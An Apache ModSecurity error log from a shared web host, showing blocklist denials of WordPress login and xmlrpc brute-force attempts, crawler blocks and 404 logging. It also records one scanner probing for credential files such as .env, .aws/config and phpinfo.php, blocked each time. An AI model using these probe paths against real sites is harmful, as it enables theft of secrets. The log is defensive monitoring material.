[Tue May 26 18:49:18.490691 2026] [security2:error] [pid 1025417:tid 1025425] [remote 51.79.254.190:45632] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 190.254.79.51.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWd1lHbArxonFeMXvQxBQAAbQc"]
[Tue May 26 18:49:18.624377 2026] [security2:error] [pid 1025417:tid 1025536] [remote 216.73.216.30:1527] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/sitemap.xml"] [unique_id "ahWd1lHbArxonFeMXvQxDQAAJXY"]
[Tue May 26 18:49:18.659921 2026] [security2:error] [pid 1025417:tid 1025665] [client 114.119.144.29:44569] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "newdental.com.co"] [uri "/"] [unique_id "ahWd1lHbArxonFeMXvQxEQAAAHY"], referer: http://newdental.com.co/?ucci/4280045698213007l14a/acbecg25904a.undeserver
[Tue May 26 18:49:19.194513 2026] [security2:error] [pid 1025417:tid 1025427] [remote 142.44.233.74:59398] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "shahvishaal.com"] [uri "/"] [unique_id "ahWd11HbArxonFeMXvQxKAAAUQk"]
[Tue May 26 18:49:19.194748 2026] [security2:error] [pid 1025417:tid 1025628] [client 142.44.233.74:59398] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "shahvishaal.com"] [uri "/"] [unique_id "ahWd11HbArxonFeMXvQxKAAAUQk"]
[Tue May 26 18:49:19.285388 2026] [security2:error] [pid 1025417:tid 1025575] [client 57.141.2.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWd1lHbArxonFeMXvQxHQAAABw"]
[Tue May 26 18:49:19.410001 2026] [security2:error] [pid 1025417:tid 1025539] [remote 160.250.186.220:45692] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 220.186.250.160.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "rohiniventures.com"] [uri "/wp-login.php"] [unique_id "ahWd11HbArxonFeMXvQxJwAAfXk"]
[Tue May 26 18:49:19.862018 2026] [security2:error] [pid 1025417:tid 1025430] [remote 178.128.111.105:59294] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "bhavisharchitects.com"] [uri "/config/local.env"] [unique_id "ahWd11HbArxonFeMXvQxPwAAPgw"]
[Tue May 26 18:49:21.567273 2026] [security2:error] [pid 1025417:tid 1025567] [client 57.141.2.18:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWd2VHbArxonFeMXvQxZgAAABQ"]
[Tue May 26 18:49:21.820793 2026] [security2:error] [pid 1025417:tid 1025444] [remote 185.71.88.234:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 234.88.71.185.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWd2VHbArxonFeMXvQxdwAAXho"]
[Tue May 26 18:49:21.820932 2026] [security2:error] [pid 1025417:tid 1025641] [client 185.71.88.234:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWd2VHbArxonFeMXvQxdwAAXho"]
[Tue May 26 18:49:22.191862 2026] [security2:error] [pid 1025417:tid 1025439] [remote 103.95.119.103:55726] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.119.95.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bosscoirs.com"] [uri "/wp-login.php"] [unique_id "ahWd2lHbArxonFeMXvQxfAAADhU"]
[Tue May 26 18:49:22.312441 2026] [security2:error] [pid 1025417:tid 1025446] [remote 178.128.111.105:59294] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "bhavisharchitects.com"] [uri "/wp-content/plugins/some-plugin/config.php"] [unique_id "ahWd2lHbArxonFeMXvQxgAAAaRw"]
[Tue May 26 18:49:23.881510 2026] [security2:error] [pid 1025417:tid 1025455] [remote 216.73.216.30:27646] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/sitemap.xml"] [unique_id "ahWd21HbArxonFeMXvQxrAAANiU"]
[Tue May 26 18:49:23.969804 2026] [security2:error] [pid 1025417:tid 1025629] [client 57.141.2.10:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWd21HbArxonFeMXvQxogAAAFI"]
[Tue May 26 18:49:24.229326 2026] [security2:error] [pid 1025417:tid 1025456] [remote 178.128.111.105:59294] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "bhavisharchitects.com"] [uri "/.aws/config"] [unique_id "ahWd3FHbArxonFeMXvQxrgAANCY"]
[Tue May 26 18:49:26.549800 2026] [security2:error] [pid 1025417:tid 1025653] [client 57.141.2.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWd3lHbArxonFeMXvQx3AAAAGo"]
[Tue May 26 18:49:26.662742 2026] [security2:error] [pid 1025417:tid 1025468] [remote 178.128.111.105:59294] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "bhavisharchitects.com"] [uri "/.env.backup.live"] [unique_id "ahWd3lHbArxonFeMXvQx5AAAEDI"]
[Tue May 26 18:49:28.755673 2026] [security2:error] [pid 1025417:tid 1025495] [remote 178.128.111.105:59294] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "bhavisharchitects.com"] [uri "/.env.release"] [unique_id "ahWd4FHbArxonFeMXvQyFgAAEU0"]
[Tue May 26 18:49:28.777978 2026] [security2:error] [pid 1025417:tid 1025602] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWd4FHbArxonFeMXvQyDAAAADc"]
[Tue May 26 18:49:29.702098 2026] [security2:error] [pid 1025417:tid 1025604] [client 216.244.66.241:49790] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "ghanemgh.com"] [uri "/cryaesthesiadbdf/daabab1655875.shtml"] [unique_id "ahWd4VHbArxonFeMXvQyMAAAADk"]
[Tue May 26 18:49:29.702218 2026] [security2:error] [pid 1025417:tid 1025604] [client 216.244.66.241:49790] ModSecurity: Warning. Matched phrase "Dotbot" at REQUEST_HEADERS:User-agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "ghanemgh.com"] [uri "/cryaesthesiadbdf/daabab1655875.shtml"] [unique_id "ahWd4VHbArxonFeMXvQyMAAAADk"]
[Tue May 26 18:49:30.663457 2026] [security2:error] [pid 1025417:tid 1025483] [remote 178.128.111.105:59294] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "bhavisharchitects.com"] [uri "/config/aws.php"] [unique_id "ahWd4lHbArxonFeMXvQySgAALkE"]
[Tue May 26 18:49:32.497915 2026] [security2:error] [pid 1025417:tid 1025641] [client 57.141.2.61:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWd5FHbArxonFeMXvQyaQAAAF4"]
[Tue May 26 18:49:32.529833 2026] [security2:error] [pid 1025417:tid 1025496] [remote 185.71.88.234:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 234.88.71.185.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWd5FHbArxonFeMXvQydgAAA04"]
[Tue May 26 18:49:32.530023 2026] [security2:error] [pid 1025417:tid 1025550] [client 185.71.88.234:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWd5FHbArxonFeMXvQydgAAA04"]
[Tue May 26 18:49:32.571481 2026] [security2:error] [pid 1025417:tid 1025479] [remote 178.128.111.105:59294] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "bhavisharchitects.com"] [uri "/server/settings_prod.py"] [unique_id "ahWd5FHbArxonFeMXvQydwAAOj0"]
[Tue May 26 18:49:33.544918 2026] [security2:error] [pid 1025417:tid 1025636] [client 57.141.2.16:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWd5VHbArxonFeMXvQyhQAAAFk"]
[Tue May 26 18:49:33.644472 2026] [security2:error] [pid 1025417:tid 1025487] [remote 216.73.216.30:27646] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/sitemap.xml"] [unique_id "ahWd5VHbArxonFeMXvQykAAAO0U"]
[Tue May 26 18:49:34.463064 2026] [security2:error] [pid 1025417:tid 1025497] [remote 178.128.111.105:59294] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "bhavisharchitects.com"] [uri "/server/settings_local.py"] [unique_id "ahWd5lHbArxonFeMXvQypwAAR08"]
[Tue May 26 18:49:35.827932 2026] [security2:error] [pid 1025417:tid 1025634] [client 62.113.113.162:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWd51HbArxonFeMXvQyxgAAAFc"], referer: https://www.anujtradingco.com/top-deejay-headphones/?unapproved=1232283&moderation-hash=43b8394d8ca4bca40bc29b5b711a71c9
[Tue May 26 18:49:36.213025 2026] [security2:error] [pid 1025417:tid 1025572] [client 57.141.2.18:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWd51HbArxonFeMXvQyyQAAABk"]
[Tue May 26 18:49:36.675000 2026] [security2:error] [pid 1025417:tid 1025604] [client 62.113.113.162:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWd6FHbArxonFeMXvQy5AAAADk"], referer: https://anujtradingco.com/top-deejay-headphones/?unapproved=1232283&moderation-hash=43b8394d8ca4bca40bc29b5b711a71c9
[Tue May 26 18:49:36.921750 2026] [security2:error] [pid 1025417:tid 1025505] [remote 178.128.111.105:59294] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "bhavisharchitects.com"] [uri "/sys/info.php"] [unique_id "ahWd6FHbArxonFeMXvQy6wAAJlc"]
[Tue May 26 18:49:37.279290 2026] [security2:error] [pid 1025417:tid 1025507] [remote 5.42.158.148:52944] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 148.158.42.5.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "taotechservices.com"] [uri "/wp-login.php"] [unique_id "ahWd6VHbArxonFeMXvQy7wAABlk"]
[Tue May 26 18:49:37.833188 2026] [security2:error] [pid 1025417:tid 1025628] [client 57.141.2.55:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWd6VHbArxonFeMXvQy-AAAAFE"]
[Tue May 26 18:49:38.795805 2026] [security2:error] [pid 1025417:tid 1025520] [remote 178.128.111.105:59294] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "bhavisharchitects.com"] [uri "/information.php"] [unique_id "ahWd6lHbArxonFeMXvQzJQAAJGY"]
[Tue May 26 18:49:38.805099 2026] [security2:error] [pid 1025417:tid 1025658] [client 23.160.128.17:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWd6lHbArxonFeMXvQzIwAAAG8"], referer: https://www.anujtradingco.com/
[Tue May 26 18:49:38.918698 2026] [security2:error] [pid 1025417:tid 1025519] [remote 216.73.216.30:20161] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/sitemap.xml"] [unique_id "ahWd6lHbArxonFeMXvQzKQAAJmU"]
[Tue May 26 18:49:39.432031 2026] [security2:error] [pid 1025417:tid 1025586] [client 23.160.128.17:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWd61HbArxonFeMXvQzNQAAACc"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1430734&
[Tue May 26 18:49:40.511386 2026] [security2:error] [pid 1025417:tid 1025593] [client 185.251.19.130:60017] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 130.19.251.185.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bloggertarget.com"] [uri "/wp-login.php"] [unique_id "ahWd7FHbArxonFeMXvQzSQAAAC4"]
[Tue May 26 18:49:40.607078 2026] [security2:error] [pid 1025417:tid 1025639] [client 14.236.219.106:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWd7FHbArxonFeMXvQzVAAAAFw"]
[Tue May 26 18:49:40.615506 2026] [security2:error] [pid 1025417:tid 1025431] [remote 178.128.111.105:59294] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "bhavisharchitects.com"] [uri "/backend/phpinfo.php"] [unique_id "ahWd7FHbArxonFeMXvQzYgAAYw0"]
[Tue May 26 18:49:41.444047 2026] [security2:error] [pid 1025417:tid 1025666] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWd7VHbArxonFeMXvQzawAAAHc"]
[Tue May 26 18:49:42.551451 2026] [security2:error] [pid 1025417:tid 1025527] [remote 178.128.111.105:59294] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "bhavisharchitects.com"] [uri "/server_info.php"] [unique_id "ahWd7lHbArxonFeMXvQzhwAAEW0"]
[Tue May 26 18:49:43.235301 2026] [security2:error] [pid 1025417:tid 1025418] [remote 165.22.95.96:46668] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 96.95.22.165.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWd71HbArxonFeMXvQzmAAAQQA"]
[Tue May 26 18:49:43.273430 2026] [security2:error] [pid 1025417:tid 1025562] [client 57.141.2.18:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWd7lHbArxonFeMXvQzkgAAAA8"]
[Tue May 26 18:49:43.554246 2026] [security2:error] [pid 1025417:tid 1025535] [remote 185.71.88.234:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 234.88.71.185.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWd71HbArxonFeMXvQznQAAC3U"]
[Tue May 26 18:49:43.554488 2026] [security2:error] [pid 1025417:tid 1025558] [client 185.71.88.234:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWd71HbArxonFeMXvQznQAAC3U"]
[Tue May 26 18:49:43.662871 2026] [security2:error] [pid 1025417:tid 1025529] [remote 216.73.216.30:20161] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/sitemap.xml"] [unique_id "ahWd71HbArxonFeMXvQzsAAATG8"]
[Tue May 26 18:49:44.500157 2026] [security2:error] [pid 1025417:tid 1025421] [remote 178.128.111.105:59294] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "bhavisharchitects.com"] [uri "/api/v2/phpinfo.php"] [unique_id "ahWd8FHbArxonFeMXvQzwAAAFwM"]
[Tue May 26 18:49:45.616421 2026] [security2:error] [pid 1025417:tid 1025651] [client 57.141.2.1:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWd8VHbArxonFeMXvQzzwAAAGg"]
[Tue May 26 18:49:46.374520 2026] [security2:error] [pid 1025417:tid 1025541] [remote 178.128.111.105:59294] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "bhavisharchitects.com"] [uri "/bak/phpinfo.php"] [unique_id "ahWd8lHbArxonFeMXvQz4wAAe3s"]
[Tue May 26 18:49:48.285977 2026] [security2:error] [pid 1025417:tid 1025426] [remote 178.128.111.105:59294] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "bhavisharchitects.com"] [uri "/info/php.php"] [unique_id "ahWd9FHbArxonFeMXvQ0GAAAYwg"]
[Tue May 26 18:49:48.288220 2026] [security2:error] [pid 1025417:tid 1025428] [remote 141.138.139.98:39836] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 98.139.138.141.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWd9FHbArxonFeMXvQ0DgAAPgo"]
[Tue May 26 18:49:50.019479 2026] [security2:error] [pid 1025417:tid 1025577] [client 57.141.2.20:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWd9VHbArxonFeMXvQ0MwAAAB4"]
[Tue May 26 18:49:50.199823 2026] [security2:error] [pid 1025417:tid 1025429] [remote 178.128.111.105:59294] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "bhavisharchitects.com"] [uri "/viewinfo.php"] [unique_id "ahWd9lHbArxonFeMXvQ0RQAAags"]
[Tue May 26 18:49:50.575484 2026] [security2:error] [pid 1025417:tid 1025441] [remote 141.138.139.98:39836] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 98.139.138.141.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWd9lHbArxonFeMXvQ0TgAASRc"], referer: https://yourstorybag.com/wp-login.php
[Tue May 26 18:49:52.076555 2026] [security2:error] [pid 1025417:tid 1025439] [remote 178.128.111.105:59294] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "bhavisharchitects.com"] [uri "/app/phpinfo.php"] [unique_id "ahWd-FHbArxonFeMXvQ0bQAAExU"]
[Tue May 26 18:49:52.475615 2026] [security2:error] [pid 1025417:tid 1025663] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWd-FHbArxonFeMXvQ0bAAAAHQ"]
[Tue May 26 18:49:53.672441 2026] [security2:error] [pid 1025417:tid 1025449] [remote 216.73.216.30:17241] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/sitemap.xml"] [unique_id "ahWd-VHbArxonFeMXvQ0ngAAXx8"]
[Tue May 26 18:49:53.965995 2026] [security2:error] [pid 1025417:tid 1025452] [remote 178.128.111.105:59294] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "bhavisharchitects.com"] [uri "/local/phpinfo.php"] [unique_id "ahWd-VHbArxonFeMXvQ0ogAAWiI"]
[Tue May 26 18:49:53.990074 2026] [security2:error] [pid 1025417:tid 1025454] [remote 185.71.88.234:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 234.88.71.185.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWd-VHbArxonFeMXvQ0owAAOSQ"]
